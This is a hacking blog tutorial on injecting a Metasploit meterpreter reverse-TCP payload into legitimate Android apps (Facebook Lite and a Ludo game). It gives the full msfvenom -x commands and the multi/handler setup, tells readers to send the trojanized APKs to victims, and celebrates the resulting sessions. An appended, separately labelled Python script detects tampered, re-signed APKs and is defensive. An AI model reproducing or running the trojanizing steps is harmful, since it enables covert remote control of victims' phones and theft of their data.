
Perfectly Inject a Payload in an Original Facebook APK

VerdensS



Hey folks, I think we are all familiar with the Metasploit framework. Whenever beginners make their first move into the hacking field, their first objective is usually to hack Android smartphones, but they are not satisfied with creating a simple backdoor, so they try to inject malicious payloads into well-known applications such as WhatsApp, Instagram and Facebook to cheat the victim. While doing this we usually run into many types of errors, so in this article we will walk through the complete steps by which you can inject or embed a malicious payload in a known application.

Requirements

  • Kali Linux = 2020.1

Prerequisite

  • APKsigner or Jarsigner [One of them]
  • APK Tool [Latest]
  • ZipAlign

Let's take a look 🙂 !!

Relax 🙂 !! We will not try to cheat you, and you can satisfy yourself by seeing the machine details in clear text. HaPpY 🙂 !!


ApkTool

Let's go ahead and first download all the dependencies that we need to embed the payload in the original APK. We will download them one by one, starting with the leading tool, "apktool", which compiles and decompiles APK files.

apt install apktool


Zipalign

Zipalign is an archive alignment tool that provides an important optimization to Android application files, but make sure it is only run before the APK file has been signed.

apt install zipalign


Jarsigner

Jarsigner is the JAR signing and verification tool, used to sign JAR files and time stamp the signature. We have to install Java on our machine to configure jarsigner. The command is given below, so just execute it in the terminal.

apt-get install openjdk-11-jdk



In this version of Kali Linux, Java JDK 8 is used by default, but after executing the following command we are given two options, from which we have to select Java JDK 11.

update-alternatives --config java



After selecting it, jarsigner will automatically be configured in the terminal.

jarsigner



The configuration is complete, and our first attempt is going to be awesome: we will try to inject the malicious Metasploit payload into the well-known Facebook Lite APK. First download the APK from here.



The method is very simple: we use the same command as during payload creation and just add the "-x" parameter to inject the payload into the original APK. You can see the result in the given image, in which we have successfully injected the payload into the Facebook Lite application.

msfvenom -x facebook-lite.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Facebook.apk



Now you can send your payload to the victims in your own way. As you can see, the payload will look like the image below after downloading.



Let's come back to Kali Linux and start the multi handler to keep the meterpreter session, using the following commands.

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10
set lport 4444
run



Boom 🙂 !! As you can see, we got a meterpreter session after the victim clicked the application, so the payload injection succeeded. Now let's take another application and try to inject the payload into it. You can also download it from here.



Now again we will follow the same steps that we followed above and try to inject the payload into the official Ludo application.

msfvenom -x com.azodus.ludo.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o Ludo.apk



Swag 🙂 !! WOOOOOOO ! Again we succeeded in embedding the malicious payload into the original APK, and we have successfully got the meterpreter session again.

About the Author: Shubham Goyal, Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be contacted on LinkedIn.
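
Seen from the defender's side, an APK rebuilt and re-signed as described in this post no longer matches the publisher's build, and that difference can be checked. The script below is an added example, not part of the original post: the function names and the two sample archives are constructed, and it assumes you hold a reference copy of the same app version obtained from the official store.

```python
import hashlib
import io
import zipfile

# v1 (JAR) signature blocks, the kind jarsigner writes into META-INF/.
SIG_SUFFIXES = (".RSA", ".DSA", ".EC")


def entry_digests(apk_bytes):
    """Map each ZIP entry name to the SHA-256 of its uncompressed content."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {n: hashlib.sha256(zf.read(n)).hexdigest() for n in zf.namelist()}


def is_sig_block(name):
    return name.startswith("META-INF/") and name.upper().endswith(SIG_SUFFIXES)


def compare_apks(reference, suspect):
    """Report how a suspect APK differs from a same-version reference copy."""
    # Across different versions the signature block legitimately changes; there
    # the signing certificates must be compared instead of the raw blocks.
    ref, sus = entry_digests(reference), entry_digests(suspect)
    ref_sigs = {d for n, d in ref.items() if is_sig_block(n)}
    sus_sigs = {d for n, d in sus.items() if is_sig_block(n)}
    return {
        "added": sorted(set(sus) - set(ref)),
        "removed": sorted(set(ref) - set(sus)),
        "changed": sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n]),
        "resigned": ref_sigs != sus_sigs,
    }


def build_apk(entries):
    """Constructed sample input: a minimal ZIP standing in for an APK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed placeholder content, not real APK data.
REFERENCE = build_apk({"AndroidManifest.xml": b"manifest", "classes.dex": b"dex",
                       "res/icon.png": b"icon", "META-INF/CERT.RSA": b"vendor-sig"})
SUSPECT = build_apk({"AndroidManifest.xml": b"manifest+permissions", "classes.dex": b"dex+extra",
                     "res/icon.png": b"icon", "META-INF/SIGNING.RSA": b"other-sig"})

if __name__ == "__main__":
    print(compare_apks(REFERENCE, SUSPECT))
```

A changed `classes.dex` or `AndroidManifest.xml` together with a replaced signature block is the pattern to flag; APKs signed only with the v2 or later schemes carry the signature outside the ZIP entries, so check those with `apksigner verify --print-certs` instead.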